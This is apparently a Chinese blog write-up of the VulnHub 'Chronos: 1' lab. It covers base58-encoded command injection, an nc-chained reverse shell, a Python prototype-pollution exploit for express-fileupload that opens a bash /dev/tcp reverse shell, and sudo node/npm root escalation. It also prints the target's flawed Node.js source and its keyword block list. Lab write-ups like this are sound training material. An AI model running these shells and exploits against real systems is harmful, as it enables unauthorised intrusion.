靶机三:CHRONOS_ 1

最新推荐文章于 2024-06-15 13:56:56 发布
最新推荐文章于 2024-06-15 13:56:56 发布
阅读量345 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/travelnight/article/details/130508160
版权

一、靶机地址

https://www.vulnhub.com/entry/chronos-1,735/
image.png

二、信息收集

  1. arpscan 发现主机地址。

image.png

  1. nmap信息收集,发现80、8000、22端口。

1670405746201.png

  1. 可以访问到靶机页面

image.png

三、渗透阶段

  1. burpsuit抓包,发现访问主页面的时候会请求“chronos.local”域名。在hosts文件中添加这个主域名解析到靶机地址,发现是一个请求时间的URL。

image.png
image.png
2.删掉参数后,发现继续输出时间信息。
image.png
3.怀疑是date命令直接在linux上执行了,于是加上ls参数,错误页面提示不是base58加密。那说明之前web前段自动提交的参数是经过base58加密的。
image.png
4.由4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL解密可得’+Today is %A, %B %d, %Y %H:%M:%S.'。那猜测存在命令注入的话,也应加入base58加密。对“&&ls”加密后发送,页面有异常提示。
image.png
重新浏览器刷新一下,成功执行ls命令。
image.png
5.换成NC串联命令nc 192.168.56.103 9999 | /bin/bash | nc 192.168.56.103 8888,进行编码传入,成功获取到shell
image.png
image.png
6.发现当前用户是www权限,用户中还存在imera用户
image.png
7.发现两个web目录,其中一个有root权限,两个web判断都是mode.js开发的
image.png

  1. 两个web引用的组件如下。

image.png

  1. chronos这个web的app.js代码如下,可以看到是绑定了8000端口的。虽然对id、whoami等一些参数做了过滤,但是命令最后还是会执行,没有起到作用。
// created by alienum for Penetration Testing
const express = require('express');
const { exec } = require("child_process");
const bs58 = require('bs58');
const app = express();

const port = 8000;

const cors = require('cors');


app.use(cors());

app.get('/', (req,res) =>{
  
    res.sendFile("/var/www/html/index.html");
});

app.get('/date', (req, res) => {

    var agent = req.headers['user-agent'];
    var cmd = 'date ';
    const format = req.query.format;
    const bytes = bs58.decode(format);
    var decoded = bytes.toString();
    var concat = cmd.concat(decoded);
    if (agent === 'Chronos') {
        if (concat.includes('id') || concat.includes('whoami') || concat.includes('python') || concat.includes('nc') || concat.includes('bash') || concat.includes('php') || concat.includes('which') || concat.includes('socat')) {

            res.send("Something went wrong");
        }
        exec(concat, (error, stdout, stderr) => {
            if (error) {
                console.log(`error: ${error.message}`);
                return;
            }
            if (stderr) {
                console.log(`stderr: ${stderr}`);
                return;
            }
            res.send(stdout);
        });
    }
    else{

        res.send("Permission Denied");
    }
})

app.listen(port,() => {

    console.log(`Server running at ${port}`);

})
  1. chronos-v2的server.js代码如下,可以看到绑定了127.0.0.1的8080端口
const express = require('express');
const fileupload = require("express-fileupload");
const http = require('http')

const app = express();

app.use(fileupload({ parseNested: true }));

app.set('view engine', 'ejs');
app.set('views', "/opt/chronos-v2/frontend/pages");

app.get('/', (req, res) => {
   res.render('index')
});

const server = http.Server(app);
const addr = "127.0.0.1"
const port = 8080;
server.listen(port, addr, () => {
   console.log('Server listening on ' + addr + ' port ' + port);
});
  1. frp搭建隧道,将靶机本机的8080端口代理出来

image.png
image.png

  1. 之前信息收集,发现是nodjs开发的网站,看了下苑老师的视频,从chronos-v2的组件express-flieupload上有原型污染漏洞。但是试了下,靶机似乎不支持post,找了几个payload都没用

281d925599e99cb41fd06a128071f9c.png

  1. 参照网上方法,直接在靶机本身上执行exp是可以弹shell成功的,反弹shell到4444
import requests
cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.103/4444 0>&1"'

# pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})
# execute command
requests.get('http://127.0.0.1:8080')

image.png

  1. 为了进一步确定是不是代理的问题。重新在物理机pycharm上发包,加上http代理到bp上再试一下。确定是代理问题,只能在本机127.0.0.1端口上执行exp。

image.png

四、提权

  1. 在imera用户的根目录下翻到一个user.txt文件,有部分信息。

image.png

  1. sudo -l 提示npm、node命令不需要密码可以执行root权限

image.png

  1. 试了下npm命令是可以执行shell命令的。很好奇的是""和’'返回的结果不一样

ae8d23030b4e03f82f95469f55fb13f.png
4.获取到root flag
image.png

travelnight
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub之Chronos:1 靶机实验
weixin_64112307的博客
06-30 1008
EJS-RCE
Vulnhub靶机--Chronos
Tauil的博客
08-05 617
登录靶机页面,查看网络数据包,发现有两个数据包被拒绝了,查看到其IP显示为chronos.local,其回显仍然是靶机IP,所以需要修改 dns 指向,在本地 hosts 文件中将该网站进行自定义转向,输入命令。尝试将该参数进行解码,发现是base58编码,并且该语句后面衔接其他命令是可执行的,那么要是该网页输入参数没有进行替换或者过滤的话,便可以执行任意语句。发现该靶机还开了另外一个网络服务,在本地8080端口,而外网无法访问到,我们先找到该网络服务所在文件,发现在另一个版本的chronos-v2中。..
Vulnhub:CHRONOS: 1
最新发布
weixin_69670995的博客
06-15 545
在 /opt/chronos-v2/backend 下发现 express-fileupload,百度一下它的漏洞,找的了攻击代码。抓包发现有个请求,最后一个显示了时间,将get传参进行解密,尝试了base64,结果失败,后来发现是base58解密。将下载的虚拟机导入Oracle VM VirtualBox中,网络设置仅主机模式,网卡使用和kali相同的网卡。发现是显示当前时间的命令,猜测是命令执行,尝试一下命令要用base58编码一下。发现22,80,8080端口,使用浏览器访问80端口。
Chronos靶机
qq_40646572的博客
05-24 373
信息搜集 使用nmap扫描获取网段信息。 获取到靶机的ip地址以及相应开放的服务端口。 web服务探测 打开靶机web服务,在网络连接中,发现一个域名解析失败。这个域名应该是靶机的8000端口的服务。 在/etc/hosts文件中添加域名解析。 域名解析成功。发现其中http://chronos.local:8000/date?请求时options请求方式,感觉可能会有点信息可以利用。 使用bp尝试更改下请求方式。 更改方式加上修改参数的值,发现存在一个经过编码的参数值。 发现只是base
【VulnHub靶场】——CHRONOS: 1
热门推荐
Demo不是emo的博客
12-31 1万+
24次系统性打靶第次训练,每次打靶后都会分享靶场攻略和总结的知识点
Vulnhub靶机随笔-Chronos
weixin_59005129的博客
03-07 875
我们可以利用node,node就是类似于java语言的开发环境,我们平常写的是python反弹shell,今天写一个java的反弹shell 命令: sudo node -e 'child_process.spawn("/bin/bash", {stdio: [0,1,2]})'
靶机渗透练习61-Chronos
hirak0的博客
04-20 1833
靶机描述 靶机地址:https://www.vulnhub.com/entry/chronos-1,735/ Description Difficulty : medium This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.58 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
靶机CH4INRULZ_V1练习报告1
08-08
靶机CH4INRULZ_V1练习报告1
Cardinal:CTF:triangular_flag: AWD (Attack with Defense) 线下赛平台 AWD platform - 欢迎 Star~ :sparkles:
05-06
AWD 实时 3D 攻击大屏为项目 ,已适配接入 Cardinal)文档官方文档 cardinal.ink请您在使用前认真阅读官方使用文档,谢谢 ♪(・ω・)ノ教程AWD平台搭建–Cardinal功能介绍管理员创建题目、分配题目靶机、参赛队伍、...
靶机Moonraker_1练习报告1
08-08
靶机Moonraker_1练习报告1
Chronos靶机渗透
woshicainiao666的博客
02-05 527
想到靶机开放了8000端口,这个url又指向chronos.local域名,也是访问8000端口,所以我们将域名绑定IP地址。server.js是一个只允许本地的文件上传,node.js模块上网查到存在漏洞原核污染:CVE-2020-7699。漏洞的要求是”parseNested” 特征为 ture,而在server.js中刚好满足,所以使用exp提权。抓8000端口的包,刷新8000端口,一定要抓有回显的包。在/etc/hosts中添加IP地址 域名。
Chronos靶机打靶过程(利用express-fileupload)
捣蛋鬼
03-27 3913
难度:中(构思巧妙) 目标:取得2个flag+root权限 涉及攻击方法: 端口扫描 WEB侦察 命令注入 数据编解码 搜索大法 框架漏洞利用 代码审计 NC串联 本地提权 0x01 sudo netdiscover -r 10.0.2.0/16 #主机发现 sudo nmap -p- 10.0.2.6 #扫描全端口 sudo nmap -p22,80,8000 -sV 10.0.2.6 #扫描端口所开启的服务 0x02 访问80端口并查看页面源码 在script标签里发现一段脚本 v
VulnHub靶场-Chronos
热爱学习,喜欢折腾!
06-11 860
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBoxBoot打开,从启动虚机到获取操作系统的root权限和查看flag。
VulnHub-Chronos: 1
weixin_44249502的博客
08-25 284
本文介绍了VulnHub平台上的CHRONOS: 1虚拟靶场,旨在帮助网络安全爱好者提升技能。该靶场设计了多个真实场景,要求玩家使用渗透测试和漏洞利用技巧获取隐藏在系统中的flag。文章解释了靶场背景、玩法和优势,强调其为安全从业人员提供了实践经验,加强了防御和攻击能力。通过解决不同难度任务,参与者能够更好地应对不断出现的网络安全挑战。
VnlnHub CHRONOS 1
weixin_45682839的博客
09-03 553
VnlnHub CHRONOS 1靶场通关攻略记录,涉及知识包括:端口服务探测、解编码、命令注入、nc串联、linux本地提权、框架漏洞利用
vulnhub靶场-Chronos
qq_42947816的博客
05-10 883
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值